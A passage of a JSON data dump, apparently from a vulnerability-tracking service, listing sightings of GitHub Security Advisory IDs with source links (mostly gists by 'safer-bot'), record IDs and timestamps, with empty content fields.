"2025-07-16T08:29:39.000000Z"}, {"uuid": "934d1bbb-917e-4a70-83e4-8493c2faf6da", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-gmg8-593g-7mv3", "type": "seen", "source": "https://gist.github.com/safer-bot/c75be349324ad1aff79587c1c14593df", "content": "", "creation_timestamp": "2025-07-16T08:29:39.000000Z"}, {"uuid": "98890ebf-7765-4650-9e6b-2682f1714e36", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-735f-pc8j-v9w8", "type": "seen", "source": "https://gist.github.com/safer-bot/229e4501237d89dacff9852ebc17d8ec", "content": "", "creation_timestamp": "2025-07-16T12:36:59.000000Z"}, {"uuid": "2127bb89-4475-46d8-a159-b1522e3eb181", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-4g9r-vxhx-9pgx", "type": "seen", "source": "https://gist.github.com/safer-bot/ef184347803e15dac9646caefc82d2d0", "content": "", "creation_timestamp": "2025-07-16T13:34:57.000000Z"}, {"uuid": "b9cf0d00-57a5-4ff5-8bcf-6b84b67740cc", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-w9p3-5cr8-m3jj", "type": "seen", "source": "https://gist.github.com/safer-bot/ef184347803e15dac9646caefc82d2d0", "content": "", "creation_timestamp": "2025-07-16T13:34:57.000000Z"}, {"uuid": "1aa99a85-2ac5-443f-b4ca-17d3c601895c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-f7vh-qwp3-x37m", "type": "seen", "source": "https://gist.github.com/safer-bot/ef184347803e15dac9646caefc82d2d0", "content": "", "creation_timestamp": "2025-07-16T13:34:57.000000Z"}, {"uuid": "3852adb2-e2bb-4594-834d-888f8f293b18", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-gp7f-rwcx-9369", "type": "seen", "source": "https://gist.github.com/safer-bot/ef184347803e15dac9646caefc82d2d0", "content": "", "creation_timestamp": "2025-07-16T13:34:57.000000Z"}, {"uuid": "ad7dd00a-ca56-4a59-9168-a8b13ce93ffc", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-9fjv-px63-6jvj", "type": "seen", "source": "https://infosec.exchange/users/DarkWebInformer/statuses/114627914705648930", "content": "", "creation_timestamp": "2025-06-05T00:26:12.349230Z"}, {"uuid": "bcb0d4cb-27d4-495b-840a-4d22cce70fe9", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-g6ph-x5wf-g337", "type": "seen", "source": "https://gist.github.com/safer-bot/a2f85bb3abd40ab169cfae05635f3231", "content": "", "creation_timestamp": "2025-07-16T03:44:39.000000Z"}, {"uuid": "177994e0-0ce6-49a6-b891-4e421ab81a10", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-7g45-4rm6-3mm3", "type": "seen", "source": "https://gist.github.com/safer-bot/a2f85bb3abd40ab169cfae05635f3231", "content": "", "creation_timestamp": "2025-07-16T03:44:39.000000Z"}, {"uuid": "dbc40e11-ab9c-4b2d-9382-8aad02d2b727", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-4jq9-2xhw-jpx7", "type": "seen", "source": "https://gist.github.com/safer-bot/cfcba5505d874083a3a7abb340485690", "content": "", "creation_timestamp": "2025-07-16T10:26:36.000000Z"}, {"uuid": "75bc2df2-b1fa-4411-94c2-1a151117c242", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-48rh-qgjr-xfj6", "type": "seen", "source": "https://gist.github.com/safer-bot/4c33df58d6e9e99bed2ad03447ffd9d7", "content": "", "creation_timestamp": "2025-07-16T03:45:45.000000Z"}, {"uuid": "2be81a49-6861-4454-a361-c8daf87fdefc", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-269g-pwp5-87pp", "type": "seen", "source": "https://gist.github.com/safer-bot/4c33df58d6e9e99bed2ad03447ffd9d7", "content": "", "creation_timestamp": "2025-07-16T03:45:45.000000Z"}, {"uuid": "64fe59a9-5181-4097-984a-27e503f11c7a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-m72m-mhq2-9p6c", "type": "seen", "source": "https://gist.github.com/safer-bot/4c33df58d6e9e99bed2ad03447ffd9d7", "content": "", "creation_timestamp": "2025-07-16T03:45:45.000000Z"}, {"uuid": "51808e6e-5d62-46d4-a1d4-e8ee67252afc", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-gp7f-rwcx-9369", "type": "seen", "source": "https://gist.github.com/safer-bot/4c33df58d6e9e99bed2ad03447ffd9d7", "content": "", "creation_timestamp": "2025-07-16T03:45:45.000000Z"}, {"uuid": "1356a239-352a-497f-a99e-d9b01a7680d7", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-jjjh-jjxp-wpff", "type": "seen", "source": "https://gist.github.com/safer-bot/805a0de180caecb98379377b3f053467", "content": "", "creation_timestamp": "2025-07-16T08:32:34.000000Z"}, {"uuid": "45f56c05-ca54-48ce-82bd-9fb7591dc279", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-rgv9-q543-rqg4", "type": "seen", "source": "https://gist.github.com/safer-bot/805a0de180caecb98379377b3f053467", "content": "", "creation_timestamp": "2025-07-16T08:32:34.000000Z"}, {"uuid": "477023ff-f5d0-43b1-aa8d-5783c23f5355", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-78wr-2p64-hpwj", "type": "seen", "source": "https://gist.github.com/safer-bot/b196a72942875a558652d2209dbb3781", "content": "", "creation_timestamp": "2025-07-16T10:27:37.000000Z"}, {"uuid": "6d73dfa4-783e-47a3-89df-609aea0a30a8", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-jjjh-jjxp-wpff", "type": "seen", "source": "https://gist.github.com/safer-bot/6428f4e82456989e69180d6bca28d722", "content": "", "creation_timestamp": "2025-07-16T10:31:30.000000Z"}, {"uuid": "81ebf725-0af4-4116-a75e-c06e681827c9", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-2363-cqg2-863c", "type": "seen", "source": "https://gist.github.com/safer-bot/6428f4e82456989e69180d6bca28d722", "content": "", "creation_timestamp": "2025-07-16T10:31:30.000000Z"}, {"uuid": "65792041-333a-43e9-91aa-ff715a4bd550", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-57j2-w4cx-62h2", "type": "seen", "source": "https://gist.github.com/safer-bot/6428f4e82456989e69180d6bca28d722", "content": "", "creation_timestamp": "2025-07-16T10:31:30.000000Z"}, {"uuid": "74370ab3-52f8-4818-83b7-40e5555a17a0", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-78wr-2p64-hpwj", "type": "seen", "source": "https://gist.github.com/safer-bot/72e2c848f21b34ec979e22db8468c8b5", "content": "", "creation_timestamp": "2025-07-16T12:39:11.000000Z"}, {"uuid": "6d38e6c2-d255-4ee2-b1c8-b96fac5e5274", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-2qp4-g3q3-f92w", "type": "seen", "source": "https://gist.github.com/safer-bot/72e2c848f21b34ec979e22db8468c8b5", "content": "", "creation_timestamp": "2025-07-16T12:39:11.000000Z"}, {"uuid": "99fbcdc3-b549-46f1-8a56-4169ab399c29", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-23C8-4WWR-G3C6", "type": "seen", "source": "https://t.me/brutsecurity/1466", "content": "", "creation_timestamp": "2026-07-10T00:00:33.424674Z"}, {"uuid": "4db380d2-35b5-4640-be32-02aa657fa3cd", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-cgwf-w82q-5jrr", "type": "seen", "source": "https://gist.github.com/safer-bot/f6680196cf1b0aee1c5fa9abea2ce0e1", "content": "", "creation_timestamp": "2025-07-16T03:54:14.000000Z"}, {"uuid": "096dc8be-3875-4fd4-9f35-cacd3bd9eaae", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-ch48-9r3q-pv7x", "type": "seen", "source": "https://gist.github.com/safer-bot/f6680196cf1b0aee1c5fa9abea2ce0e1", "content": "", "creation_timestamp": "2025-07-16T03:54:14.000000Z"}, {"uuid": "44d5fc45-1909-43e5-88a6-9a2138a5633c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-4265-ccf5-phj5", "type": "seen", "source": "https://gist.github.com/safer-bot/f6680196cf1b0aee1c5fa9abea2ce0e1", "content": "", "creation_timestamp": "2025-07-16T03:54:14.000000Z"}, {"uuid": "d600224e-e477-42e9-adb6-50f2073df752", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-6r3c-xf4w-jxjm", "type": "seen", "source": "https://gist.github.com/safer-bot/f6680196cf1b0aee1c5fa9abea2ce0e1", "content": "", "creation_timestamp": "2025-07-16T03:54:14.000000Z"}, {"uuid": "4d60621b-1e96-43d8-9358-5f16b3ea940c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-xq3w-v528-46rv", "type": "seen", "source": "https://gist.github.com/safer-bot/377e11baa0869e0b381b07a3d7ed6e90", "content": "", "creation_timestamp": "2025-07-16T10:34:44.000000Z"}, {"uuid": "3c2f73be-0883-4138-bb0e-f23bdcd69bd9", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-gm62-rw4g-vrc4", "type": "seen", "source": "https://gist.github.com/safer-bot/377e11baa0869e0b381b07a3d7ed6e90", "content": "", "creation_timestamp": "2025-07-16T10:34:44.000000Z"}, {"uuid": "cf6fe2ac-1a45-4014-bb64-a5c3f92b45ed", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-4g9r-vxhx-9pgx", "type": "seen", "source": "https://gist.github.com/safer-bot/377e11baa0869e0b381b07a3d7ed6e90", "content": "", "creation_timestamp": "2025-07-16T10:34:44.000000Z"}, {"uuid": "6b8244e0-92bd-4fd8-88a7-aad08771b86d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-389x-839f-4rhx", "type": "seen", "source": "https://gist.github.com/safer-bot/377e11baa0869e0b381b07a3d7ed6e90", "content": "", "creation_timestamp": "2025-07-16T10:34:44.000000Z"}, {"uuid": "445bbb1d-4cd3-43bc-91d3-2280c35ee0dc", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-6g6m-m6h5-w9gf", "type": "seen", "source": "https://gist.github.com/zhenthebuilder/796766496fd40b2efb4ad88864ee96cb", "content": "", "creation_timestamp": "2025-06-06T23:11:11.000000Z"}, {"uuid": "81452124-4f3e-40b2-8b96-efe98b5f10c2", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-78wr-2p64-hpwj", "type": "seen", "source": "https://gist.github.com/safer-bot/0a516166b329057e81ec35ad6fb00e3b", "content": "", "creation_timestamp": "2025-07-16T03:56:59.000000Z"}, {"uuid": "e93694e9-3d98-48ee-86bb-07d3bc83f66c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-9w3m-gqgf-c4p9", "type": "seen", "source": "https://gist.github.com/safer-bot/f17dd9ec05eaa98cd94e7e32cd52f5f8", "content": "", "creation_timestamp": "2025-07-16T03:58:10.000000Z"}, {"uuid": "576c3e0b-5d9a-495d-aea8-e9925d5d72c9", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-cqj8-47ch-rvvq", "type": "seen", "source": "https://gist.github.com/safer-bot/f17dd9ec05eaa98cd94e7e32cd52f5f8", "content": "", "creation_timestamp": "2025-07-16T03:58:10.000000Z"}, {"uuid": "b4501b67-697e-49d1-88f4-ba6fff8a4848", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-c4r9-r8fh-9vj2", "type": "seen", "source": "https://gist.github.com/safer-bot/f17dd9ec05eaa98cd94e7e32cd52f5f8", "content": "", "creation_timestamp": "2025-07-16T03:58:10.000000Z"}, {"uuid": "577fd787-016e-4d7c-b5d9-f82831c117ac", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-mjmj-j48q-9wg2", "type": "seen", "source": "https://gist.github.com/safer-bot/f17dd9ec05eaa98cd94e7e32cd52f5f8", "content": "", "creation_timestamp": "2025-07-16T03:58:10.000000Z"}, {"uuid": "00f8a320-641d-4314-bcf4-38b76e0cfc5f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-47g3-mf24-6559", "type": "seen", "source": "https://gist.github.com/safer-bot/f17dd9ec05eaa98cd94e7e32cd52f5f8", "content": "", "creation_timestamp": "2025-07-16T03:58:10.000000Z"}, {"uuid": "bdaddbec-d993-4c40-a425-b2252c5925fe", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-hhhw-99gj-p3c3", "type": "seen", "source": "https://gist.github.com/safer-bot/f17dd9ec05eaa98cd94e7e32cd52f5f8", "content": "", "creation_timestamp": "2025-07-16T03:58:10.000000Z"}, {"uuid": "a5122329-d16f-474f-b5ca-310fdbfd28b2", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-78wr-2p64-hpwj", "type": "seen", "source": "https://gist.github.com/safer-bot/14d01f8bdf18596ebf772c18ab09d32f", "content": "", "creation_timestamp": "2025-07-16T08:49:08.000000Z"}, {"uuid": "79fbcdb8-2c53-44af-8c31-d38fd67dfee1", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-w33c-445m-f8w7", "type": "seen", "source": "https://gist.github.com/safer-bot/00b68cc5e12330d9350cd01ab279b6eb", "content": "", "creation_timestamp": "2025-07-16T10:38:45.000000Z"}, {"uuid": "49733a45-cf65-435d-9f1e-5da995f83ee9", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-qh8g-58pp-2wxh", "type": "seen", "source": "https://gist.github.com/safer-bot/c5ef5221e2cb60139a177929ba5fe952", "content": "", "creation_timestamp": "2025-07-16T04:03:07.000000Z"}, {"uuid": "a8aa7efa-f482-4797-9bdc-11ef20e1f510", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-hmr7-m48g-48f6", "type": "seen", "source": "https://gist.github.com/safer-bot/c5ef5221e2cb60139a177929ba5fe952", "content": "", "creation_timestamp": "2025-07-16T04:03:07.000000Z"}, {"uuid": "077cf4f2-28a9-4d77-911b-e6eaf4947469", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-g8m5-722r-8whq", "type": "seen", "source": "https://gist.github.com/safer-bot/c5ef5221e2cb60139a177929ba5fe952", "content": "", "creation_timestamp": "2025-07-16T04:03:07.000000Z"}, {"uuid": "f50a3dc5-7564-4f35-8992-047ee08c25e2", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-hq9p-pm7w-8p54", "type": "seen", "source": "https://gist.github.com/safer-bot/b3123653fb887a3a9df34fb195aa6e7d", "content": "", "creation_timestamp": "2025-07-16T08:54:21.000000Z"}, {"uuid": "e7768df8-dada-479b-a0d4-2884f1eef4e9", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-cqj8-47ch-rvvq", "type": "seen", "source": "https://gist.github.com/safer-bot/00b68cc5e12330d9350cd01ab279b6eb", "content": "", "creation_timestamp": "2025-07-16T10:38:45.000000Z"}, {"uuid": "c4a0f04b-5d90-45dd-9c50-ea2ed675f0b8", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-vmq6-5m68-f53m", "type": "seen", "source": "https://gist.github.com/safer-bot/1caaae65aa52f2baea445a2c8e5e649a", "content": "", "creation_timestamp": "2025-07-16T13:34:25.000000Z"}, {"uuid": "7c3b1938-259d-4590-9afb-e0d79f47c8a9", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-wxqc-pxw9-g2p8", "type": "seen", "source": "https://gist.github.com/safer-bot/ed4bf4fbd35fbbbe3c137b8b518ddb07", "content": "", "creation_timestamp": "2025-07-16T14:38:12.000000Z"}, {"uuid": "cbb258b0-c553-4dfc-beeb-df1352ffd79e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-xf96-w227-r7c4", "type": "seen", "source": "https://gist.github.com/safer-bot/ed4bf4fbd35fbbbe3c137b8b518ddb07", "content": "", "creation_timestamp": "2025-07-16T14:38:12.000000Z"}, {"uuid": "2d2f0ed7-85b7-4e4a-a003-572da70e42b3", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-4wp7-92pw-q264", "type": "seen", "source": "https://gist.github.com/safer-bot/ed4bf4fbd35fbbbe3c137b8b518ddb07", "content": "", "creation_timestamp": "2025-07-16T14:38:12.000000Z"}, {"uuid": "27bc799c-a943-4003-92c6-f2c22862e48a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-4g9r-vxhx-9pgx", "type": "seen", "source": "https://gist.github.com/safer-bot/c5ef5221e2cb60139a177929ba5fe952", "content": "", "creation_timestamp": "2025-07-16T04:03:07.000000Z"}, {"uuid": "5f59f694-5af8-4343-95fd-21a4d3992360", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-58qw-p7qm-5rvh", "type": "seen", "source": "https://gist.github.com/safer-bot/c5ef5221e2cb60139a177929ba5fe952", "content": "", "creation_timestamp": "2025-07-16T04:03:07.000000Z"}, {"uuid": "2550c794-35e9-47a9-86f3-7238b1bac551", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-73m2-qfq3-56cx", "type": "seen", "source": "https://gist.github.com/safer-bot/c5ef5221e2cb60139a177929ba5fe952", "content": "", "creation_timestamp": "2025-07-16T04:03:07.000000Z"}, {"uuid": "03a632e4-7d42-4e23-b41c-7fed67e6749d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-hw58-3793-42gg", "type": "seen", "source": "https://gist.github.com/safer-bot/b3123653fb887a3a9df34fb195aa6e7d", "content": "", "creation_timestamp": "2025-07-16T08:54:21.000000Z"}, {"uuid": "4d16e40f-4f87-4756-9465-d53df89b2109", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-4jq9-2xhw-jpx7", "type": "seen", "source": "https://gist.github.com/safer-bot/00b68cc5e12330d9350cd01ab279b6eb", "content": "", "creation_timestamp": "2025-07-16T10:38:45.000000Z"}, {"uuid": "d6a74b72-1caa-4eb2-aefc-0e8f2eacfb13", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-7rjr-3q55-vv33", "type": "seen", "source": "https://gist.github.com/safer-bot/912d718f6c5933e018e0967a0f381894", "content": "", "creation_timestamp": "2025-07-16T13:37:57.000000Z"}, {"uuid": "fce312cf-ded1-47a0-b4e2-72d2f2aacb72", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-8489-44mv-ggj8", "type": "seen", "source": "https://gist.github.com/safer-bot/912d718f6c5933e018e0967a0f381894", "content": "", "creation_timestamp": "2025-07-16T13:37:57.000000Z"}, {"uuid": "36069a72-f3b4-45d6-aeb0-4ec0a558538d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-jfh8-c2jp-5v3q", "type": "seen", "source": "https://gist.github.com/safer-bot/912d718f6c5933e018e0967a0f381894", "content": "", "creation_timestamp": "2025-07-16T13:37:57.000000Z"}, {"uuid": "0cdf0d67-92ec-4ab7-8b6a-f14d0915ba95", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-p6xc-xr62-6r2g", "type": "seen", "source": "https://gist.github.com/safer-bot/912d718f6c5933e018e0967a0f381894", "content": "", "creation_timestamp": "2025-07-16T13:37:57.000000Z"}, {"uuid": "e7008ef2-a091-4b7d-bd84-2029b7c78eb8", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-q4rv-gq96-w7c5", "type": "seen", "source": "https://gist.github.com/safer-bot/c5ef5221e2cb60139a177929ba5fe952", "content": "", "creation_timestamp": "2025-07-16T04:03:07.000000Z"}, {"uuid": "e1881a93-dacd-4aa2-8445-54e83c2dd2cb", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-2qp4-g3q3-f92w", "type": "seen", "source": "https://gist.github.com/safer-bot/c5ef5221e2cb60139a177929ba5fe952", "content": "", "creation_timestamp": "2025-07-16T04:03:07.000000Z"}, {"uuid": "feea493c-fe41-4738-8996-072d25579ca3", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-4265-ccf5-phj5", "type": "seen", "source": "https://gist.github.com/safer-bot/c5ef5221e2cb60139a177929ba5fe952", "content": "", "creation_timestamp": "2025-07-16T04:03:07.000000Z"}, {"uuid": "0a14fac6-3c9f-4af7-9d51-cc5c977ee7fa", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-5jfq-x6xp-7rw2", "type": "seen", "source": "https://gist.github.com/safer-bot/b3123653fb887a3a9df34fb195aa6e7d", "content": "", "creation_timestamp": "2025-07-16T08:54:21.000000Z"}, {"uuid": "dc6bd03f-27ae-404d-a858-bffb17e535cd", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-xq3w-v528-46rv", "type": "seen", "source": "https://gist.github.com/safer-bot/24c020ed9d2c5206c5029cfb25825bf0", "content": "", "creation_timestamp": "2025-07-16T10:38:12.000000Z"}, {"uuid": "2c2b3aed-87dd-4a60-b011-03528cd81a06", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-5jpm-x58v-624v", "type": "seen", "source": "https://gist.github.com/safer-bot/24c020ed9d2c5206c5029cfb25825bf0", "content": "", "creation_timestamp": "2025-07-16T10:38:12.000000Z"}, {"uuid": "419a47b4-f327-4f5e-bf7d-4feb2805cb79", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-X684-96HH-833X", "type": "seen", "source": "https://t.me/brutsecurity/1553", "content": "", "creation_timestamp": "2026-07-10T00:00:33.153726Z"}, {"uuid": "18e9d241-1d92-442a-89cb-d14fd0719db2", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-4wp7-92pw-q264", "type": "seen", "source": "https://gist.github.com/safer-bot/2e9965ac739a51f43e76b2e10662bafc", "content": "", "creation_timestamp": "2025-07-16T04:02:34.000000Z"}, {"uuid": "4bcf774f-3d76-42ae-8c65-da86b2c1a547", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-fg3j-q579-v8x4", "type": "seen", "source": "https://gist.github.com/safer-bot/98076be44b63186a53bdf845de69ea26", "content": "", "creation_timestamp": "2025-07-16T08:12:10.000000Z"}, {"uuid": "f6e70750-d7aa-4f6c-8cf4-8c7f989a4576", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-m72m-mhq2-9p6c", "type": "seen", "source": "https://gist.github.com/safer-bot/98076be44b63186a53bdf845de69ea26", "content": "", "creation_timestamp": "2025-07-16T08:12:10.000000Z"}, {"uuid": "6dc4f8c9-d198-4216-9ee4-f49ecda5b76c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-2h3j-m7gr-25xj", "type": "seen", "source": "https://gist.github.com/safer-bot/98076be44b63186a53bdf845de69ea26", "content": "", "creation_timestamp": "2025-07-16T08:12:10.000000Z"}, {"uuid": 